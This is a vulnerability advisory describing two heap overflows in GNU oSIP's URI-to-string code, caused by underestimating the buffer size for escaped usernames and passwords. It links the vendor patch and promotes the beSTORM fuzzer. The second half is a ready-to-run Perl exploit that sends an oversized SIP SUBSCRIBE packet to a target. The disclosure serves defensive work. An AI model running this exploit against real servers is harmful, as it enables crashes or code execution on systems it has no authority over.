GNU oSIP URI Parsing Heap Overflows
------------------------------------------------------------------------

SUMMARY

Two exploitable heap overflows were discovered by Beyond Security's
automated and innovative vulnerability discovering tool, beSTORM.

beSTORM quickly discovered two exploitable heap overflows in GNU oSIP, an
open source library implementation of SIP. These heap overflows can be
used to overwrite arbitrary heap content and modify the execution path of
the program once the library tries to free the allocated heap memory.

DETAILS

Vulnerable Systems:
* liboSIP version 2.0.6 and prior

Immune Systems:
* liboSIP version 2.0.7 or newer

Technical Details:
Inside the osip_uri.c file the function osip_uri_to_str() determines the
size of the buffer to allocate by doing the following calculations:
..
  if (url->username != NULL)
    len = len + strlen(url->username) + 10;    /* count escaped char */
  if (url->password != NULL)
    len = len + strlen(url->password) + 10;
..
buf = (char *) osip_malloc (len);
  if (buf == NULL)
    return -1;
  tmp = buf;
..
  if (url->username != NULL)
    {
      char *tmp2 = __osip_uri_escape_userinfo (url->username);

      sprintf (tmp, "%s", tmp2);
      osip_free (tmp2);
      tmp = tmp + strlen (tmp);
    }
..

However, the two calculations above do not take into account that the
url->username and ur->password variables can contain characters that
require escaping and that their eventual size requirement would be larger
than strlen(url->username) + 10 and strlen(url->password) + 10
respectively.

For example, the username '<' (lower than) would get encoded into %3C,
taking three times the length returned by strlen(url->username).

Therefore, if an attacker provides 6 time the character '<' (lower than)
the strlen() function would return 6, adding to it a value of 10 would
result in the length of 16, while the encoded content's length would
result in 6*3=18 meaning that we are overflowing the allocated space.

Patch:
The vendor has patched the latest version and has made a diff file of the
patch:

<http://savannah.gnu.org/cgi-bin/viewcvs/osip/osip/src/osipparser2/osip_uri.c.diff?r1=1.5&r2=1.6>
http://savannah.gnu.org/cgi-bin/viewcvs/os...f?r1=1.5&r2=1.6

About beSTORM:
beSTORM can break apart a documented protocol, such as SIP, and generate
millions of different attack vectors. The result is a comprehensive check
of the protocol implementation and the resistance of the product to buffer
overflow and similar remote attacks.

beSTORM Against sipD:
beSTORM's SIP testing module has been previously launched against another
the open source product sipD. In that occasion beSTORM was able to detect
the existence of two security vulnerabilities, a format string (
<http://www.securiteam.com/unixfocus/6R00G1595S.html>
http://www.securiteam.com/unixfocus/6R00G1595S.html) and denial of service
( <http://www.securiteam.com/unixfocus/6B00F0A95O.html>
http://www.securiteam.com/unixfocus/6B00F0A95O.html).

Exploit:
The following exploit was automatically generated by beSTORM based on the
sequence required to trigger the vulnerabilities. We have consolidated the
two different attacks - the username heap overflow and the password heap
overflow into one script.

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-04-12 13:06
# Copyright  Beyond Security Ltd.

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;
my $repeated_type = "<";

if (!$target)
{
usage();

print "No target has been supplied, reverting to 192.168.1.1.\n";
$target = "192.168.1.1";
}

my $repeating = shift;
if (!$repeating )
{
usage();

print "Repeating has not been supplied, reverting to 10.\n";
$repeating = 10;
}

my $attackerip = shift;
if (!$attackerip)
{
usage();

print "Attacker IP address has not been supplied, reverting to
192.168.1.2.\n";
$attackerip = "192.168.1.2";
}

my $attackedip = shift;
if (!$attackedip)
{
usage();

print "Contact IP address has not been supplied, reverting to
192.168.1.3.\n";
$attackedip = "192.168.1.3";
}

print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";
print "Will repeat '<' $repeating times\n";

my $repeated_data = ($repeated_type x $repeating);
my $target_port = 5060;

my $packet =<<END;
SUBSCRIBE sip:$repeated_data:$repeated_data\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:3277\r
From: "STORM"<sip:$attackedip:3277>\r
Call-ID: 1STORM9210\@$attackedip\r
CSeq: 1 INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerip:5059>\r
\r
END

print "Sending: [$packet]\n";

socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));

my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);

send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to
$target : $target_port : $!\n";

print "Done.\n";

sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print ("#"x50);
print "\n";
print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
print "# hostname\t-\tThe host the packet will be sent to.\n";
print "# repeater\t-\tThe number of times the character will be sent
(repeated character $repeated_type).\n";
print "# attackerip\t-\tThe IP address from which the packet should
be\n";
print "\t\t\taddressed from (doesn't have to be your IP address).\n";
print "# attackedip\t-\tThe IP address that you are contacting\n";
print "\t\t\t(doesn't have to be the hostname IP's address).\n";
print "\n";
print "Results may vary depending on how the remote host handles
packets.\n";
print "For example:\n";
print " * Some SIP Proxies won't look into packets addressed to it
(attackedip or attackerip).\n";
print " * Some SIP Routers won't handle packets that aren't addressed to
it.\n";
print "etc\n";
print "\n";
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:beSTORM@securiteam.com>
beSTORM.